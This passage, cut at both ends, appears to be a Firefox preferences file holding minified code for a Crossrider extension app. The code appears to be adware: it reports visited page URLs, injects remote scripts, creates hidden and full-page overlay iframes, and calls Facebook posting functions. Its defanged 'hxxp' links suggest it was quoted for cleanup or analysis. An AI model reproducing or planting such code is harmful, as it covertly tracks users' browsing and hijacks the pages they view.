this.safe_add(this.bit_rol(this.safe_add(this.safe_add(a,b),this.safe_add(e,g)),d),c)},md5_ff:function(b,a,c,e,d,g,i){return this.md5_cmn(a&amp;c|~a&amp;e,b,a,d,g,i)},md5_gg:function(b,a,c,e,d,g,i){return this.md5_cmn(a&amp;e|c&amp;~e,b,a,d,g,i)},md5_hh:function(b,a,c,e,d,g,i){return this.md5_cmn(a^c^e,b,a,d,g,i)},md5_ii:function(b,a,c,d,h,g,i){return this.md5_cmn(c^(a|~d),b,a,\nh,g,i)},safe_add:function(b,a){var c=(b&amp;65535)+(a&amp;65535);return(b&gt;&gt;16)+(a&gt;&gt;16)+(c&gt;&gt;16)&lt;&lt;16|c&amp;65535},bit_rol:function(a,d){return a&lt;&lt;d|a&gt;&gt;&gt;32-d}},parse_url:function(a,d){for(var c=\&quot;source scheme authority userInfo user pass host port relative path directory file query fragment\&quot;.split(\&quot; \&quot;),e=/^(?:([^:\\/?#]+):)?(?:\\/\\/()(?:(?:()(?:([^:@]*):?([^:@]*))?@)?([^:\\/?#]*)(?::(\\d*))?))?()(?:(()(?:(?:[^?#\\/]*\\/)*)()(?:[^?#]*))(?:\\?([^#]*))?(?:#(.*))?)/.exec(a),h={},g=14;g--;)e[g]&amp;&amp;(h[c[g]]=e[g]);if(d)return h[d.replace(\&quot;PHP_URL_\&quot;,\n\&quot;\&quot;).toLowerCase()];delete h.source;return h}};if(null==appAPI.db.get(\&quot;_GPL_sr_halt\&quot;)&amp;&amp;d.pageUrl&amp;&amp;(-1==d.pageUrl.indexOf(\&quot;://\&quot;)&amp;&amp;(d.pageUrl=\&quot;hxxp://\&quot;+d.pageUrl),a=a.processRequest(\&quot;nav\&quot;,a.parse_url(d.pageUrl),d.pageUrl)))return a},_GPL_BG_VARS)}};&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1000015.name&quot;, &quot;GPL Background (BG)&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1000015.ver&quot;, 4);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_13.code&quot;, &quot;(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection()}else{if(document.getSelection){return document.getSelection()}else{var f=document.selection&amp;&amp;document.selection.createRange();if(f.text){return f.text}return false}}return false}if(e==null){a.debug(\&quot;selectedText: no callback function provided.\&quot;);return}if(c==null){c={}}c.lastSelection=\&quot;\&quot;;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){case\&quot;undefined\&quot;:b=$jquery(\&quot;body\&quot;);break;case\&quot;object\&quot;:if(c.element instanceof jQuery){b=c.element}else{a.debug(\&quot;selectedText: element provided as an unrecorgnize object.\&quot;);return}break;case\&quot;string\&quot;:b=$jquery(c.element);break;default:a.debug(\&quot;selectedText: unknown element.\&quot;);return}b.mouseup(function(g){var f=d();if(f&amp;&amp;String(f)==c.lastSelection){c.lastSelection=\&quot;\&quot;;return}else{c.lastSelection=String(f)}if(f&amp;&amp;String(f).length&gt;=c.minlength&amp;&amp;String(f).length&lt;=c.maxlength){e(f,g)}})}})(appAPI);(function(a){a.dom={};a.dom.isIframe=function(){return top!=self};a.dom.addInlineCSS=function(c){var b=document.createElement(\&quot;style\&quot;);b.setAttribute(\&quot;type\&quot;,\&quot;text/css\&quot;);if(b.styleSheet&amp;&amp;typeof(b.styleSheet.cssText)===\&quot;string\&quot;){b.styleSheet.cssText=c}else{b.innerHTML=c}(document.getElementsByTagName(\&quot;head\&quot;)[0]||document.getElementsByTagName(\&quot;body\&quot;)[0]).appendChild(b)};a.dom.addRemoteCSS=function(c){var b=document.createElement(\&quot;link\&quot;);b.setAttribute(\&quot;rel\&quot;,\&quot;stylesheet\&quot;);b.setAttribute(\&quot;type\&quot;,\&quot;text/css\&quot;);b.setAttribute(\&quot;href\&quot;,c);(document.getElementsByTagName(\&quot;head\&quot;)[0]||document.getElementsByTagName(\&quot;body\&quot;)[0]).appendChild(b);return b};a.dom.addInlineJS=function(d){var b=document.createElement(\&quot;script\&quot;);try{b.setAttribute(\&quot;type\&quot;,\&quot;text/javascript\&quot;);b.innerHTML=d}catch(c){b.type=\&quot;text/javascript\&quot;;b.text=d}(document.getElementsByTagName(\&quot;head\&quot;)[0]||document.getElementsByTagName(\&quot;body\&quot;)[0]).appendChild(b)};a.dom.addRemoteJS=function(d,c){var b=document.createElement(\&quot;script\&quot;);b.setAttribute(\&quot;type\&quot;,\&quot;text/javascript\&quot;);b.setAttribute(\&quot;src\&quot;,d);if(typeof(c)==\&quot;function\&quot;){b.onload=b.onreadystatechange=function(){c(b);b.onload=b.onreadystatechange=null}}(document.getElementsByTagName(\&quot;head\&quot;)[0]||document.getElementsByTagName(\&quot;body\&quot;)[0]).appendChild(b);return b};a.dom.callPageFunction=function(){var c=arguments[0];var d=[c,\&quot;(\&quot;],f=[];if(arguments.length&gt;1){for(var b=1;b&lt;arguments.length;b++){var e=arguments[b];if(e===undefined){continue}if(typeof(e)===\&quot;string\&quot;){f.push(&apos;\&quot;&apos;+e+&apos;\&quot;&apos;)}else{if(typeof(e)===\&quot;object\&quot;){f.push(JSON.stringify(e))}else{f.push(e)}}}}d.push(f.join(\&quot;,\&quot;));d.push(\&quot;)\&quot;);self.location.assign(\&quot;javascript:\&quot;+d.join(\&quot;\&quot;))}})(appAPI);(function(a){a.matchPages=function(){var e=false;for(var c=0;c&lt;arguments.length;c++){var f=arguments[c];var g=false;if(typeof(f)==\&quot;string\&quot;){f=f.replace(/\\./,\&quot;\\\\.\&quot;).replace(/\\*/,\&quot;.*\&quot;);var d=\&quot;^http.?\\\\:\\\\/\\\\/\&quot;+f;var b=new RegExp(d);g=document.location.href.match(b)?true:false}else{if(typeof(f)==\&quot;object\&quot;){g=document.location.href.match(f)?true:false}}e=e||g;if(e){break}}return e}})(appAPI);(function(a){a.shortcut={all_shortcuts:{},add:function(c,i,e){var h={type:\&quot;keydown\&quot;,propagate:false,disable_in_input:false,target:document,keycode:false};if(!e){e=h}else{for(var b in h){if(typeof e[b]==\&quot;undefined\&quot;){e[b]=h[b]}}}var g=e.target;if(typeof e.target==\&quot;string\&quot;){g=document.getElementById(e.target)}var d=this;c=c.toLowerCase();var f=function(o){o=o||window.event;if(e.disable_in_input){var l;if(o.target){l=o.target}else{if(o.srcElement){l=o.srcElement}}if(l.nodeType==3){l=l.parentNode}if(l.tagName==\&quot;INPUT\&quot;||l.tagName==\&quot;TEXTAREA\&quot;){return}}if(o.keyCode){code=o.keyCode}else{if(o.which){code=o.which}}var n=String.fromCharCode(code).toLowerCase();if(code==188){n=\&quot;,\&quot;}if(code==190){n=\&quot;.\&quot;}var s=c.split(\&quot;+\&quot;);var r=0;var p={\&quot;`\&quot;:\&quot;~\&quot;,\&quot;1\&quot;:\&quot;!\&quot;,\&quot;2\&quot;:\&quot;@\&quot;,\&quot;3\&quot;:\&quot;#\&quot;,\&quot;4\&quot;:\&quot;$\&quot;,\&quot;5\&quot;:\&quot;%\&quot;,\&quot;6\&quot;:\&quot;^\&quot;,\&quot;7\&quot;:\&quot;&amp;\&quot;,\&quot;8\&quot;:\&quot;*\&quot;,\&quot;9\&quot;:\&quot;(\&quot;,\&quot;0\&quot;:\&quot;)\&quot;,\&quot;-\&quot;:\&quot;_\&quot;,\&quot;=\&quot;:\&quot;+\&quot;,\&quot;;\&quot;:\&quot;:\&quot;,\&quot;&apos;\&quot;:&apos;\&quot;&apos;,\&quot;,\&quot;:\&quot;&lt;\&quot;,\&quot;.\&quot;:\&quot;&gt;\&quot;,\&quot;/\&quot;:\&quot;?\&quot;,\&quot;\\\\\&quot;:\&quot;|\&quot;};var m={esc:27,escape:27,tab:9,space:32,\&quot;return\&quot;:13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,\&quot;break\&quot;:19,insert:45,home:36,\&quot;delete\&quot;:46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123};var q={shift:{wanted:false,pressed:false},ctrl:{wanted:false,pressed:false},alt:{wanted:false,pressed:false},meta:{wanted:false,pressed:false}};if(o.ctrlKey){q.ctrl.pressed=true}if(o.shiftKey){q.shift.pressed=true}if(o.altKey){q.alt.pressed=true}if(o.metaKey){q.meta.pressed=true}for(var j=0;k=s[j],j&lt;s.length;j++){if(k==\&quot;ctrl\&quot;||k==\&quot;control\&quot;){r++;q.ctrl.wanted=true}else{if(k==\&quot;shift\&quot;){r++;q.shift.wanted=true}else{if(k==\&quot;alt\&quot;){r++;q.alt.wanted=true}else{if(k==\&quot;meta\&quot;){r++;q.meta.wanted=true}else{if(k.length&gt;1){if(m[k]==code){r++}}else{if(e.keycode){if(e.keycode==code){r++}}else{if(n==k){r++}else{if(p[n]&amp;&amp;o.shiftKey){n=p[n];if(n==k){r++}}}}}}}}}}if(r==s.length&amp;&amp;q.ctrl.pressed==q.ctrl.wanted&amp;&amp;q.shift.pressed==q.shift.wanted&amp;&amp;q.alt.pressed==q.alt.wanted&amp;&amp;q.meta.pressed==q.meta.wanted){i(o);if(!e.propagate){o.cancelBubble=true;o.returnValue=false;if(o.stopPropagation){o.stopPropagation();o.preventDefault()}return false}}};this.all_shortcuts[c]={callback:f,target:g,event:e.type};if(g.addEventListener){g.addEventListener(e.type,f,false)}else{if(g.attachEvent){g.attachEvent(\&quot;on\&quot;+e.type,f)}else{g[\&quot;on\&quot;+e.type]=f}}},remove:function(b){b=b.toLowerCase();var e=this.all_shortcuts[b];delete (this.all_shortcuts[b]);if(!e){return}var c=e.event;var d=e.target;var f=e.callback;if(d.detachEvent){d.detachEvent(\&quot;on\&quot;+c,f)}else{if(d.removeEventListener){d.removeEventListener(c,f,false)}else{d[\&quot;on\&quot;+c]=false}}}}})(appAPI);&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_13.name&quot;, &quot;CrossriderAppUtils&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_13.ver&quot;, 2);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_14.code&quot;, &quot;if(typeof(appAPI)===\&quot;undefined\&quot;){appAPI={}}appAPI.JSON={};if(typeof JSON!==\&quot;undefined\&quot;){appAPI.JSON=JSON}else{(function(){function f(n){return n&lt;10?\&quot;0\&quot;+n:n}if(typeof Date.prototype.to_CR_JSON!==\&quot;function\&quot;){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear()+\&quot;-\&quot;+f(this.getUTCMonth()+1)+\&quot;-\&quot;+f(this.getUTCDate())+\&quot;T\&quot;+f(this.getUTCHours())+\&quot;:\&quot;+f(this.getUTCMinutes())+\&quot;:\&quot;+f(this.getUTCSeconds())+\&quot;Z\&quot;:null};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf()}}var cx=/[\\u0000\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g,escapable=/[\\\\\\\&quot;\\x00-\\x1f\\x7f-\\x9f\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g,gap,indent,meta={\&quot;\\b\&quot;:\&quot;\\\\b\&quot;,\&quot;\\t\&quot;:\&quot;\\\\t\&quot;,\&quot;\\n\&quot;:\&quot;\\\\n\&quot;,\&quot;\\f\&quot;:\&quot;\\\\f\&quot;,\&quot;\\r\&quot;:\&quot;\\\\r\&quot;,&apos;\&quot;&apos;:&apos;\\\\\&quot;&apos;,\&quot;\\\\\&quot;:\&quot;\\\\\\\\\&quot;},rep;function quote(string){escapable.lastIndex=0;return escapable.test(string)?&apos;\&quot;&apos;+string.replace(escapable,function(a){var c=meta[a];return typeof c===\&quot;string\&quot;?c:\&quot;\\\\u\&quot;+(\&quot;0000\&quot;+a.charCodeAt(0).toString(16)).slice(-4)})+&apos;\&quot;&apos;:&apos;\&quot;&apos;+string+&apos;\&quot;&apos;}function str(key,holder){var i,k,v,length,mind=gap,partial,value=holder[key];if(value&amp;&amp;typeof value===\&quot;object\&quot;&amp;&amp;typeof value.to_CR_JSON===\&quot;function\&quot;){value=value.to_CR_JSON(key)}if(typeof rep===\&quot;function\&quot;){value=rep.call(holder,key,value)}switch(typeof value){case\&quot;string\&quot;:return quote(value);case\&quot;number\&quot;:return isFinite(value)?String(value):\&quot;null\&quot;;case\&quot;boolean\&quot;:case\&quot;null\&quot;:return String(value);case\&quot;object\&quot;:if(!value){return\&quot;null\&quot;}gap+=indent;partial=[];if(Object.prototype.toString.apply(value)===\&quot;[object Array]\&quot;){length=value.length;for(i=0;i&lt;length;i+=1){partial[i]=str(i,value)||\&quot;null\&quot;}v=partial.length===0?\&quot;[]\&quot;:gap?\&quot;[\\n\&quot;+gap+partial.join(\&quot;,\\n\&quot;+gap)+\&quot;\\n\&quot;+mind+\&quot;]\&quot;:\&quot;[\&quot;+partial.join(\&quot;,\&quot;)+\&quot;]\&quot;;gap=mind;return v}if(rep&amp;&amp;typeof rep===\&quot;object\&quot;){length=rep.length;for(i=0;i&lt;length;i+=1){k=rep[i];if(typeof k===\&quot;string\&quot;){v=str(k,value);if(v){partial.push(quote(k)+(gap?\&quot;: \&quot;:\&quot;:\&quot;)+v)}}}}else{for(k in value){if(Object.hasOwnProperty.call(value,k)){v=str(k,value);if(v){partial.push(quote(k)+(gap?\&quot;: \&quot;:\&quot;:\&quot;)+v)}}}}v=partial.length===0?\&quot;{}\&quot;:gap?\&quot;{\\n\&quot;+gap+partial.join(\&quot;,\\n\&quot;+gap)+\&quot;\\n\&quot;+mind+\&quot;}\&quot;:\&quot;{\&quot;+partial.join(\&quot;,\&quot;)+\&quot;}\&quot;;gap=mind;return v}}if(typeof appAPI.JSON.stringify!==\&quot;function\&quot;){appAPI.JSON.stringify=function(value,replacer,space){var i;gap=\&quot;\&quot;;indent=\&quot;\&quot;;if(typeof space===\&quot;number\&quot;){for(i=0;i&lt;space;i+=1){indent+=\&quot; \&quot;}}else{if(typeof space===\&quot;string\&quot;){indent=space}}rep=replacer;if(replacer&amp;&amp;typeof replacer!==\&quot;function\&quot;&amp;&amp;(typeof replacer!==\&quot;object\&quot;||typeof replacer.length!==\&quot;number\&quot;)){throw new Error(\&quot;appAPI.JSON.stringify\&quot;)}return str(\&quot;\&quot;,{\&quot;\&quot;:value})}}if(typeof appAPI.JSON.parse!==\&quot;function\&quot;){appAPI.JSON.parse=function(text,reviver){var j;function walk(holder,key){var k,v,value=holder[key];if(value&amp;&amp;typeof value===\&quot;object\&quot;){for(k in value){if(Object.hasOwnProperty.call(value,k)){v=walk(value,k);if(v!==undefined){value[k]=v}else{delete value[k]}}}}return reviver.call(holder,key,value)}text=String(text);cx.lastIndex=0;if(cx.test(text)){text=text.replace(cx,function(a){return\&quot;\\\\u\&quot;+(\&quot;0000\&quot;+a.charCodeAt(0).toString(16)).slice(-4)})}if(/^[\\],:{}\\s]*$/.test(text.replace(/\\\\(?:[\&quot;\\\\\\/bfnrt]|u[0-9a-fA-F]{4})/g,\&quot;@\&quot;).replace(/\&quot;[^\&quot;\\\\\\n\\r]*\&quot;|true|false|null|-?\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d+)?/g,\&quot;]\&quot;).replace(/(?:^|:|,)(?:\\s*\\[)+/g,\&quot;\&quot;))){j=eval(\&quot;(\&quot;+text+\&quot;)\&quot;);return typeof reviver===\&quot;function\&quot;?walk({\&quot;\&quot;:j},\&quot;\&quot;):j}throw new SyntaxError(\&quot;appAPI.JSON.parse\&quot;)}}}())}(function(a){a.debug=function(h,f){if(!a.isDebugMode()){return}var b=!a.debug.settings.console;if(f!=null){b=f}try{if(!b){var g=new Date();var i=(((a.debug.settings.timestamp)&amp;&amp;(typeof(h)==\&quot;string\&quot;))?(g.toLocaleTimeString()+\&quot;.\&quot;+g.getMilliseconds()+\&quot;: \&quot;+h):h);console.log(i)}else{alert(h)}}catch(c){alert(h)}};a.debug.settings={console:true,timestamp:true}})(appAPI);(function(a){a.installer={};a.installer.getParams=function(){return(a.db.get(\&quot;InstallerParams\&quot;)||{})};a.installer.getUnixTime=function(){return(a.db.get(\&quot;InstallationTime\&quot;)||null)}})(appAPI);(function(b){b.time={};b.time.secondsFromNow=function(c){return a(c*1000)};b.time.secondsAgo=function(c){return a(c*-1000)};b.time.minutesFromNow=function(c){return a(c*60*1000)};b.time.minutesAgo=function(c){return a(c*60*-1000)};b.time.hoursFromNow=function(c){return a(c*3600*1000)};b.time.hoursAgo=function(c){return a(c*3600*-1000)};b.time.daysFromNow=function(c){return a(c*3600*24*1000)};b.time.daysAgo=function(c){return a(c*3600*24*-1000)};b.time.yearsFromNow=function(c){return a(c*365*3600*24*1000)};b.time.yearsAgo=function(c){return a(c*365*3600*24*-1000)};function a(c){return new Date(new Date().getTime()+c)}})(appAPI);(function(a){a.analytics={};a.analytics.trackUrl=function(b){function c(h,j,e){function o(q,i){return q+Math.floor(Math.random()*(i-q))}var l=1000000000,p=o(l,9999999999),f=o(10000000,99999999),g=o(l,2147483647),n=(new Date()).getTime(),m=window.location,k=new Image(),d=document.location.protocol+\&quot;//www.google-analytics.com/__utm.gif?utmwv=1.3&amp;utmn=\&quot;+p+\&quot;&amp;utmsr=-&amp;utmsc=-&amp;utmul=-&amp;utmje=0&amp;utmfl=-&amp;utmdt=-&amp;utmhn=\&quot;+j+\&quot;&amp;utmr=\&quot;+m+\&quot;&amp;utmp=\&quot;+e+\&quot;&amp;utmac=\&quot;+h+\&quot;&amp;utmcc=__utma%3D\&quot;+f+\&quot;.\&quot;+g+\&quot;.\&quot;+n+\&quot;.\&quot;+n+\&quot;.\&quot;+n+\&quot;.2%3B%2B__utmb%3D\&quot;+f+\&quot;%3B%2B__utmc%3D\&quot;+f+\&quot;%3B%2B__utmz%3D\&quot;+f+\&quot;.\&quot;+n+\&quot;.2.2.utmccn%3D(referral)%7Cutmcsr%3D\&quot;+m.host+\&quot;%7Cutmcct%3D\&quot;+m.pathname+\&quot;%7Cutmcmd%3Dreferral%3B%2B__utmv%3D\&quot;+f+\&quot;.-%3B\&quot;;k.src=d}if((this.settings.account==\&quot;\&quot;)||(this.settings.domain==\&quot;\&quot;)){a.debug(\&quot;Error: In order to use the analytics API you must first specify your domain and account ID from Google Analytics!\\nThis can easily done by setting appAPI.setting.account and appAPI.setting.domain\&quot;);return}c(this.settings.account,this.settings.domain,b)};a.analytics.trackEvent=function(c,e,b,d){function f(m,o,h,k,n,u,v){function t(x,i){return x+Math.floor(Math.random()*(i-x))}var q=1000000000,w=t(q,9999999999),j=t(10000000,99999999),l=t(q,2147483647),s=(new Date()).getTime(),r=window.location,p=new Image(),g=document.location.protocol+\&quot;//www.google-analytics.com/__utm.gif?utmwv=4.8.9&amp;utmn=\&quot;+w+\&quot;&amp;utmsr=-&amp;utmsc=-&amp;utmul=-&amp;utmje=0&amp;utmfl=-&amp;utmdt=-&amp;utmhn=\&quot;+o+\&quot;&amp;utmr=-&amp;utmt=event&amp;utme=5(\&quot;+k+\&quot;*\&quot;+n+\&quot;*\&quot;+u+\&quot;)(\&quot;+v+\&quot;)&amp;utmp=\&quot;+h+\&quot;&amp;utmac=\&quot;+m+\&quot;&amp;utmcc=__utma%3D\&quot;+j+\&quot;.\&quot;+l+\&quot;.\&quot;+s+\&quot;.\&quot;+s+\&quot;.\&quot;+s+\&quot;.2%3B%2B__utmb%3D\&quot;+j+\&quot;%3B%2B__utmc%3D\&quot;+j+\&quot;%3B%2B__utmz%3D\&quot;+j+\&quot;.\&quot;+s+\&quot;.2.2.utmccn%3D(referral)%7Cutmcsr%3D\&quot;+r.host+\&quot;%7Cutmcct%3D\&quot;+r.pathname+\&quot;%7Cutmcmd%3Dreferral%3B%2B__utmv%3D\&quot;+j+\&quot;.-%3B\&quot;;p.src=g}if(typeof(c)!=\&quot;string\&quot;){c=\&quot;\&quot;}if(typeof(e)!=\&quot;string\&quot;){e=\&quot;\&quot;}if(typeof(b)!=\&quot;string\&quot;){b=\&quot;\&quot;}if(typeof(d)!=\&quot;number\&quot;){d=0}if((c==\&quot;\&quot;)&amp;&amp;(e==\&quot;\&quot;)&amp;&amp;(b==\&quot;\&quot;)&amp;&amp;(d==0)){a.debug(\&quot;Error: In order to use trackEvent you must specify the event parameters!\&quot;);return}if((this.settings.account==\&quot;\&quot;)||(this.settings.domain==\&quot;\&quot;)){a.debug(\&quot;Error: In order to use the analytics API you must first specify your domain and account ID from Google Analytics!\\nThis can easily done by setting appAPI.setting.account and appAPI.setting.domain\&quot;);return}f(this.settings.account,this.settings.domain,document.location.href,c,e,b,d)};a.analytics.settings={account:\&quot;\&quot;,domain:\&quot;\&quot;}})(appAPI);&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_14.name&quot;, &quot;CrossriderUtils&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_14.ver&quot;, 2);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_15.code&quot;, &quot;(function(f){var u={};var e=Math.floor(Math.random()*99999);var g=Math.floor(Math.random()*99999999999999)+\&quot;Z\&quot;+(new Date()).getTime();var a=\&quot;\&quot;;var c=\&quot;\&quot;;if(f.platform==\&quot;FF\&quot;||f.platform==\&quot;CH\&quot;){e=\&quot;\&quot;}function t(w,x){for(css_prop in x){if(x.hasOwnProperty(css_prop)){w.style[css_prop]=x[css_prop]}}}function p(z,w){z+=f.appInfo.id+a+e;var y=document.getElementById(z);if(y){y.parentNode.removeChild(y)}y=document.createElement(\&quot;iframe\&quot;);y.setAttribute(\&quot;id\&quot;,z);y.setAttribute(\&quot;name\&quot;,z);y.setAttribute(\&quot;type\&quot;,\&quot;content\&quot;);y.setAttribute(\&quot;allowtransparency\&quot;,\&quot;true\&quot;);y.setAttribute(\&quot;frameborder\&quot;,\&quot;0\&quot;);y.frameBorder=\&quot;0\&quot;;y.allowtransparency=\&quot;true\&quot;;var x=function(A){if(A.target){A.target.style.visibility=\&quot;visible\&quot;}else{if(A.srcElement){A.srcElement.style.visibility=\&quot;visible\&quot;}}};if(\&quot;addEventListener\&quot; in y){y.addEventListener(\&quot;load\&quot;,x,false)}else{if(\&quot;attachEvent\&quot; in y){y.attachEvent(\&quot;onload\&quot;,x)}}y.src=w;y.allowTransparency=\&quot;true\&quot;;y.setAttribute(\&quot;style\&quot;,\&quot;position:absolute !important; top:0 !important;left:0 !important; border:0 !important; width:99% !important; height:130% !important; z-index:99999 !important;\&quot;);t(y,{position:\&quot;absolute\&quot;,top:\&quot;0\&quot;,left:\&quot;0\&quot;,position:\&quot;absolute\&quot;,border:\&quot;0\&quot;,position:\&quot;absolute\&quot;,width:\&quot;100%\&quot;,height:\&quot;100%\&quot;,zIndex:\&quot;9999999\&quot;,visibility:\&quot;hidden\&quot;});(document.documentElement||document.body).appendChild(y);if(y.contentDocument){y.contentDocument.location.href=w}}function v(y,w){y+=f.appInfo.id+a+e;var x=document.getElementById(y);if(x){x.parentNode.removeChild(x)}x=document.createElement(\&quot;iframe\&quot;);x.setAttribute(\&quot;id\&quot;,y);x.setAttribute(\&quot;name\&quot;,y);x.setAttribute(\&quot;type\&quot;,\&quot;content\&quot;);x.setAttribute(\&quot;collapsed\&quot;,\&quot;true\&quot;);x.style.width=0;x.style.height=0;x.style.border=0;x.src=w;(document.documentElement||document.body).appendChild(x);if(x.contentDocument){x.contentDocument.location.href=w}}function b(y){y+=f.appInfo.id+a+e;var x=document.getElementById(y),w=(x.parentNode||document.body);if(x){w.removeChild(x)}}function o(){var w=0;if(\&quot;getTabId\&quot; in f){w=f.getTabId()}else{if(\&quot;getTabID\&quot; in FFInternal){w=FFInternal.getTabID(document,g)}}return\&quot;tid=\&quot;+w}function i(w){if(f.platform==\&quot;FF\&quot;){var x=document.getElementById(w+f.appID+a);if(x){x.parentNode.removeChild(x)}}}function k(){window.addEventListener(\&quot;message\&quot;,function(B){var y=B.origin,A=B.data;if(y.indexOf(\&quot;app\&quot;+f.appInfo.id+\&quot;.crossrider.com\&quot;)&gt;=0){var D=f.getTabId();if(D==A.tabId){var z={close_invite_window:\&quot;CrossRiderAPI__SocialCloseEventIframe\&quot;,connect:\&quot;CrossRiderAPI__FacebookConnectRequest\&quot;,is_connected:\&quot;CrossRiderAPI__FacebookIsConnectedRequest\&quot;,post_to_wall:\&quot;CrossRiderAPI__FacebookPostToWallRequest\&quot;,get_friends:\&quot;CrossRiderAPI__FacebookGetFriendsRequest\&quot;,get_info:\&quot;CrossRiderAPI__FacebookGetInfoRequest\&quot;,update_status:\&quot;CrossRiderAPI__FacebookUpdateStatusRequest\&quot;,logout:\&quot;CrossRiderAPI__FacebookLogoutRequest\&quot;,get_groups:\&quot;CrossRiderAPI__FacebookGetGroupsRequest\&quot;,get_pages:\&quot;CrossRiderAPI__FacebookGetPagesRequest\&quot;,post_to_groups:\&quot;CrossRiderAPI__FacebookPostToGroupsRequest\&quot;,post_to_pages:\&quot;CrossRiderAPI__FacebookPostToPagesRequest\&quot;,post_to_friends:\&quot;CrossRiderAPI__FacebookPostToFriendsRequest\&quot;,ui_share:\&quot;CrossRiderAPI__FacebookFbShareRequest\&quot;,ui_publish:\&quot;CrossRiderAPI__FacebookFbPublishRequest\&quot;};if(z.hasOwnProperty(A.action)){var x=A.response[0],C=A.response[1],w=z[A.action];i(w);m(C,x,w)}}}},false)}function d(){var w=[\&quot;CrossRiderAPI__SocialCloseEventIframe\&quot;,\&quot;CrossRiderAPI__FacebookConnectRequest\&quot;,\&quot;CrossRiderAPI__FacebookIsConnectedRequest\&quot;,\&quot;CrossRiderAPI__FacebookPostToWallRequest\&quot;,\&quot;CrossRiderAPI__FacebookGetFriendsRequest\&quot;,\&quot;CrossRiderAPI__FacebookGetInfoRequest\&quot;,\&quot;CrossRiderAPI__FacebookUpdateStatusRequest\&quot;,\&quot;CrossRiderAPI__FacebookLogoutRequest\&quot;,\&quot;CrossRiderAPI__FacebookGetGroupsRequest\&quot;,\&quot;CrossRiderAPI__FacebookGetPagesRequest\&quot;,\&quot;CrossRiderAPI__FacebookPostToFriendsRequest\&quot;,\&quot;CrossRiderAPI__FacebookFbShareRequest\&quot;,\&quot;CrossRiderAPI__FacebookFbPublishRequest\&quot;,\&quot;CrossRiderAPI__FacebookPostToGroupsRequest\&quot;,\&quot;CrossRiderAPI__FacebookPostToPagesRequest\&quot;];var y=function(A){var C=\&quot;\&quot;;if(B==\&quot;null\&quot;){B=null}if(A.type.indexOf(f.appID+a)&gt;=0){C=A.type.replace(f.appID+a,\&quot;\&quot;);if(w.indexOf(C)&gt;=0){var D=A.target.getAttribute(\&quot;desc\&quot;),B=A.target.getAttribute(\&quot;response\&quot;);B=f.JSON.stringify({_cr_fb:B});B=l(B);B=B._cr_fb;if(B.hasOwnProperty(\&quot;data\&quot;)){B=B.data}i(C);m(D,B,C)}}};for(var z=0,x=w.length;z&lt;x;++z){window.addEventListener(w[z]+f.appID+a,y,false)}}function h(){switch(f.platform){case\&quot;CH\&quot;:k();break;case\&quot;FF\&quot;:d();break;default:break}}function n(x){var w={invite:\&quot;crossrider--invite-iframe\&quot;,connect:\&quot;crossrider--connect-iframe\&quot;,isConnected:\&quot;crossrider--is_connected-iframe\&quot;,postToWall:\&quot;crossrider--post_to_wall-iframe\&quot;,getFriends:\&quot;crossrider--get_friends-iframe\&quot;,getInfo:\&quot;crossrider--get_info-iframe\&quot;,updateStatus:\&quot;crossrider--update_status-iframe\&quot;,logout:\&quot;crossrider--logout-iframe\&quot;,getGroups:\&quot;crossrider--get_groups-iframe\&quot;,getPages:\&quot;crossrider--get_pages-iframe\&quot;,postToGroups:\&quot;crossrider--post_to_groups-iframe\&quot;,postToPages:\&quot;crossrider--post_to_pages-iframe\&quot;,postToFriends:\&quot;crossrider--post_to_friends-iframe\&quot;,fbShare:\&quot;crossrider--ui_share-iframe\&quot;,fbPublish:\&quot;crossrider--ui_publish-iframe\&quot;};return w[x]}function l(w){return f.JSON.parse(w)}function r(z,B,D,A){u=this;var x=0;if((B)&amp;&amp;(B!=0)){x=B}else{x=z}var w=false;var E;if((!D)||(D==\&quot;\&quot;)||(D==\&quot;NA\&quot;)){w=true;E=\&quot;hxxp://app\&quot;+x+\&quot;.crossrider.com/fb\&quot;}else{w=false;E=D+(D.indexOf(\&quot;?\&quot;)===-1?\&quot;?\&quot;:\&quot;&amp;\&quot;)+\&quot;aid=\&quot;+x;if(f.platform==\&quot;FF\&quot;){D+=\&quot;?appid=\&quot;+f.appID+c}if(f.platform==\&quot;CH\&quot;){D+=\&quot;?appid=\&quot;+f.appID}}if(typeof(A)!==\&quot;undefiend\&quot;){c=\&quot;\&quot;;a=\&quot;\&quot;;if(A!=null){c=\&quot;&amp;worker=W\&quot;+A;a=\&quot;W\&quot;+A}}if(f.platform==\&quot;FF\&quot;||f.platform==\&quot;CH\&quot;){h()}this.connectCallbackFunction=null;this.inviteCallbackFunction=null;this.isConnectedCallbackFunction=null;this.postToWallCallbackFunction=null;this.getFriendsCallbackFunction=null;this.getInfoCallbackFunction=null;this.updateStatusCallbackFunction=null;this.logoutCallbackFunction=null;this.getGroupsCallbackFunction=null;this.getPagesCallbackFunction=null;this.postToGroupsCallbackFunction=null;this.postToPagesCallbackFunction=null;this.postToFriendsCallbackFunction=null;this.